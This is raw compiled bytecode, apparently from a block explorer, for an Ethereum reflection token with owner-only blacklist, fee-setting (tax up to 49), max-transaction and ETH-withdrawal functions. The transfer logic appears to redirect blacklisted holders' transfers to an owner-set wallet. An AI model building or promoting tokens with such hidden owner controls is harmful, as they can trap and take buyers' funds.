fffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b600360003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600760003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561578b5761574783600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b6157a582600c54613dbc90919063ffffffff16565b600c819055506157c081600d54613cb990919063ffffffff16565b600d81905550505056fe45524332303a207472616e7366657220746f20746865207a65726f2061646472657373416d6f756e74206d757374206265206c657373207468616e20746f74616c207265666c656374696f6e734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f2061646472657373416c726561647920626f75676874206d61785478416d6f756e742c20776169742074696c6c20636865636b206f66665472616e7366657220616d6f756e74206578636565647320746865206d61785478416d6f756e742e6d61785478416d6f756e742073686f756c642062652067726561746572207468616e20746f74616c20316539536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f7745524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655472616e7366657220616d6f756e74206d7573742062652067726561746572207468616e207a65726f57652063616e206e6f7420626c61636b6c69737420556e697377617020726f757465722e45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573736e756d546f6b656e7353656c6c546f416464546f4c69717569646974792073686f756c642062652067726561746572207468616e20746f74616c2031653957652063616e206e6f74206578636c75646520556e697377617020726f757465722e4578636c75646564206164647265737365732063616e6e6f742063616c6c20746869732066756e6374696f6e45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e175cea11c3dae489dc6f00f354d97a19b068c505a3289c3edbe78e5293a70c864736f6c634300060c0033
Deployed Bytecode
0x6080604052600436106102295760003560e01c806352390c0211610123578063a457c2d7116100ab578063c49b9a801161006f578063c49b9a8014610c67578063dd62ed3e14610ca4578063f2fde38b14610d29578063f429389014610d7a578063f815a84214610d9157610230565b8063a457c2d714610ab2578063a52fe9bb14610b23578063a9059cbb14610b5e578063af9549e014610bcf578063bcd6d44614610c2c57610230565b8063715018a6116100f2578063715018a6146109125780637ded4d6a1461092957806388f820201461097a5780638da5cb5b146109e157806395d89b4114610a2257610230565b806352390c02146107ba5780635342acb41461080b5780635880b8731461087257806370a08231146108ad57610230565b806330599fc5116101b15780634303443d116101755780634303443d146106895780634549b039146106da57806349bd5a5e146107355780634a74bb021461077657806351bc3c85146107a357610230565b806330599fc514610523578063313ce5671461055e5780633685d4191461058c57806339509351146105dd5780633bd5d1731461064e57610230565b806318160ddd116101f857806318160ddd146103a25780631bbae6e0146103cd5780631decaadc1461040857806323b872dd146104435780632d838119146104d457610230565b806306fdde0314610235578063095ea7b3146102c557806313114a9d146103365780631694505e1461036157610230565b3661023057005b600080fd5b34801561024157600080fd5b5061024a610dbc565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561028a57808201518184015260208101905061026f565b50505050905090810190601f1680156102b75780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156102d157600080fd5b5061031e600480360360408110156102e857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610e5e565b60405180821515815260200191505060405180910390f35b34801561034257600080fd5b5061034b610e7c565b6040518082815260200191505060405180910390f35b34801561036d57600080fd5b50610376610e86565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156103ae57600080fd5b506103b7610eaa565b6040518082815260200191505060405180910390f35b3480156103d957600080fd5b50610406600480360360208110156103f057600080fd5b8101908080359060200190929190505050610eb4565b005b34801561041457600080fd5b506104416004803603602081101561042b57600080fd5b8101908080359060200190929190505050610fe3565b005b34801561044f57600080fd5b506104bc6004803603606081101561046657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050611112565b60405180821515815260200191505060405180910390f35b3480156104e057600080fd5b5061050d600480360360208110156104f757600080fd5b81019080803590602001909291905050506111eb565b6040518082815260200191505060405180910390f35b34801561052f57600080fd5b5061055c6004803603602081101561054657600080fd5b810190808035906020019092919050505061126f565b005b34801561056a57600080fd5b5061057361135e565b604051808260ff16815260200191505060405180910390f35b34801561059857600080fd5b506105db600480360360208110156105af57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611375565b005b3480156105e957600080fd5b506106366004803603604081101561060057600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506116ff565b60405180821515815260200191505060405180910390f35b34801561065a57600080fd5b506106876004803603602081101561067157600080fd5b81019080803590602001909291905050506117b2565b005b34801561069557600080fd5b506106d8600480360360208110156106ac57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611943565b005b3480156106e657600080fd5b5061071f600480360360408110156106fd57600080fd5b8101908080359060200190929190803515159060200190929190505050611c22565b6040518082815260200191505060405180910390f35b34801561074157600080fd5b5061074a611cd9565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561078257600080fd5b5061078b611cfd565b60405180821515815260200191505060405180910390f35b3480156107af57600080fd5b506107b8611d10565b005b3480156107c657600080fd5b50610809600480360360208110156107dd57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611df1565b005b34801561081757600080fd5b5061085a6004803603602081101561082e57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506121a4565b60405180821515815260200191505060405180910390f35b34801561087e57600080fd5b506108ab6004803603602081101561089557600080fd5b81019080803590602001909291905050506121fa565b005b3480156108b957600080fd5b506108fc600480360360208110156108d057600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612350565b6040518082815260200191505060405180910390f35b34801561091e57600080fd5b5061092761243b565b005b34801561093557600080fd5b506109786004803603602081101561094c57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506125c1565b005b34801561098657600080fd5b506109c96004803603602081101561099d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612906565b60405180821515815260200191505060405180910390f35b3480156109ed57600080fd5b506109f661295c565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b348015610a2e57600080fd5b50610a37612985565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015610a77578082015181840152602081019050610a5c565b50505050905090810190601f168015610aa45780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b348015610abe57600080fd5b50610b0b60048036036040811015610ad557600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612a27565b60405180821515815260200191505060405180910390f35b348015610b2f57600080fd5b50610b5c60048036036020811015610b4657600080fd5b8101908080359060200190929190505050612af4565b005b348015610b6a57600080fd5b50610bb760048036036040811015610b8157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612c4a565b60405180821515815260200191505060405180910390f35b348015610bdb57600080fd5b50610c2a60048036036040811015610bf257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803515159060200190929190505050612c68565b005b348015610c3857600080fd5b50610c6560048036036020811015610c4f57600080fd5b8101908080359060200190929190505050612d8b565b005b348015610c7357600080fd5b50610ca260048036036020811015610c8a57600080fd5b81019080803515159060200190929190505050612ee1565b005b348015610cb057600080fd5b50610d1360048036036040811015610cc757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612fc6565b6040518082815260200191505060405180910390f35b348015610d3557600080fd5b50610d7860048036036020811015610d4c57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061304d565b005b348015610d8657600080fd5b50610d8f613258565b005b348015610d9d57600080fd5b50610da6613331565b6040518082815260200191505060405180910390f35b6060600e8054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610e545780601f10610e2957610100808354040283529160200191610e54565b820191906000526020600020905b815481529060010190602001808311610e3757829003601f168201915b5050505050905090565b6000610e72610e6b613339565b8484613341565b6001905092915050565b6000600d54905090565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600b54905090565b610ebc613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f7c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b633b9aca00811015610fd9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602c8152602001806158b7602c913960400191505060405180910390fd5b8060188190555050565b610feb613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146110ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b633b9aca00811015611108576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252603e8152602001806159c2603e913960400191505060405180910390fd5b8060198190555050565b600061111f848484613538565b6111e08461112b613339565b6111db8560405180606001604052806028815260200161590460289139600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000611191613339565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b849092919063ffffffff16565b613341565b600190509392505050565b6000600c54821115611248576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602a8152602001806157ee602a913960400191505060405180910390fd5b6000611252613c44565b90506112678184613c6f90919063ffffffff16565b915050919050565b611277613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611337576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6113493061134361295c565b83613341565b61135b3061135561295c565b83613538565b50565b6000601060009054906101000a900460ff16905090565b61137d613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461143d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600760008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166114fc576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b60005b6008805490508110156116fb578173ffffffffffffffffffffffffffffffffffffffff166008828154811061153057fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156116ee5760086001600880549050038154811061158c57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600882815481106115c457fe5b9060005260206000200160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060088054806116b457fe5b6001900381819060005260206000200160006101000a81549073ffffffffffffffffffffffffffffffffffffffff021916905590556116fb565b80806001019150506114ff565b5050565b60006117a861170c613339565b846117a3856005600061171d613339565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613cb990919063ffffffff16565b613341565b6001905092915050565b60006117bc613339565b9050600760008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611861576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602c815260200180615a22602c913960400191505060405180910390fd5b600061186c83613d41565b505050505090506118c581600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613dbc90919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061191d81600c54613dbc90919063ffffffff16565b600c8190555061193883600d54613cb990919063ffffffff16565b600d81905550505050565b61194b613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611a0b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611aa4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260248152602001806159556024913960400191505060405180910390fd5b600960008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611b64576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601e8152602001807f4163636f756e7420697320616c726561647920626c61636b6c6973746564000081525060200191505060405180910390fd5b6001600960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600b54831115611c9c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f416d6f756e74206d757374206265206c657373207468616e20737570706c790081525060200191505060405180910390fd5b81611cbc576000611cac84613d41565b5050505050905080915050611cd3565b6000611cc784613d41565b50505050915050809150505b92915050565b7f00000000000000000000000013df7493dd95fb3a38b5cd71da6bf01fc5dfb1b781565b601760159054906101000a900460ff1681565b611d18613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611dd8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6000611de330612350565b9050611dee81613e06565b50565b611df9613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611eb9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611f52576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526022815260200180615a006022913960400191505060405180910390fd5b600760008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615612012576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205411156120e6576120a2600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111eb565b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b6001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506008819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b612202613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146122c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600181101580156122d4575060318111155b612346576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601a8152602001807f7461784665652073686f756c6420626520696e2031202d20343900000000000081525060200191505060405180910390fd5b8060118190555050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156123eb57600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050612436565b612433600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111eb565b90505b919050565b612443613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612503576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6125c9613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612689576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600960008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16612748576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601a8152602001807f4163636f756e74206973206e6f7420626c61636b6c697374656400000000000081525060200191505060405180910390fd5b60005b600a80549050811015612902578173ffffffffffffffffffffffffffffffffffffffff16600a828154811061277c57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156128f557600a6001600a8054905003815481106127d857fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600a828154811061281057fe5b9060005260206000200160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a8054806128bb57fe5b6001900381819060005260206000200160006101000a81549073ffffffffffffffffffffffffffffffffffffffff02191690559055612902565b808060010191505061274b565b5050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600f8054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015612a1d5780601f106129f257610100808354040283529160200191612a1d565b820191906000526020600020905b815481529060010190602001808311612a0057829003601f168201915b5050505050905090565b6000612aea612a34613339565b84612ae585604051806060016040528060258152602001615a4e6025913960056000612a5e613339565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b849092919063ffffffff16565b613341565b6001905092915050565b612afc613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612bbc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60018110158015612bce575060318111155b612c40576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f6d61726b6574696e674665652073686f756c6420626520696e2031202d20313181525060200191505060405180910390fd5b8060128190555050565b6000612c5e612c57613339565b8484613538565b6001905092915050565b612c70613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612d30576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b612d93613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612e53576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60018110158015612e65575060318111155b612ed7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f6c69717569646974794665652073686f756c6420626520696e2031202d20313181525060200191505060405180910390fd5b8060138190555050565b612ee9613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612fa9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601760156101000a81548160ff02191690831515021790555050565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b613055613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613115576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561319b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260268152602001806158186026913960400191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b613260613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613320576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600047905061332e816140b4565b50565b600047905090565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156133c7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602481526020018061599e6024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561344d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602281526020018061583e6022913960400191505060405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156135be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806159796025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415613644576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806157cb6023913960400191505060405180910390fd5b6000811161369d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602981526020018061592c6029913960400191505060405180910390fd5b600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156138965760006136fa30612350565b9050601854811061370b5760185490505b60006019548210159050601760149054906101000a900460ff1615801561373e5750601760159054906101000a900460ff165b80156137475750805b801561379f57507f00000000000000000000000013df7493dd95fb3a38b5cd71da6bf01fc5dfb1b773ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156137b35760195491506137b282614120565b5b600060019050600660008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061385a5750600660008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561386457600090505b61389286601a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686846142b9565b5050505b61389e61295c565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561392557507f00000000000000000000000013df7493dd95fb3a38b5cd71da6bf01fc5dfb1b773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b156139fb57601854811115613985576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602881526020018061588f6028913960400191505060405180910390fd5b6018546139a38261399585612350565b613cb990919063ffffffff16565b11156139fa576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602f815260200180615860602f913960400191505060405180910390fd5b5b6000613a0630612350565b90506018548110613a175760185490505b60006019548210159050601760149054906101000a900460ff16158015613a4a5750601760159054906101000a900460ff165b8015613a535750805b8015613aab57507f00000000000000000000000013df7493dd95fb3a38b5cd71da6bf01fc5dfb1b773ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15613abf576019549150613abe82614120565b5b600060019050600660008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680613b665750600660008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613b7057600090505b613b7c868686846142b9565b505050505050565b6000838311158290613c31576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b83811015613bf6578082015181840152602081019050613bdb565b50505050905090810190601f168015613c235780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5060008385039050809150509392505050565b6000806000613c516145ca565b91509150613c688183613c6f90919063ffffffff16565b9250505090565b6000613cb183836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061485b565b905092915050565b600080828401905083811015613d37576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b6000806000806000806000806000613d728a601154613d6d601354601254613cb990919063ffffffff16565b614921565b9250925092506000613d82613c44565b90506000806000613d948e87866149b7565b9250925092508282828989899c509c509c509c509c509c505050505050505091939550919395565b6000613dfe83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250613b84565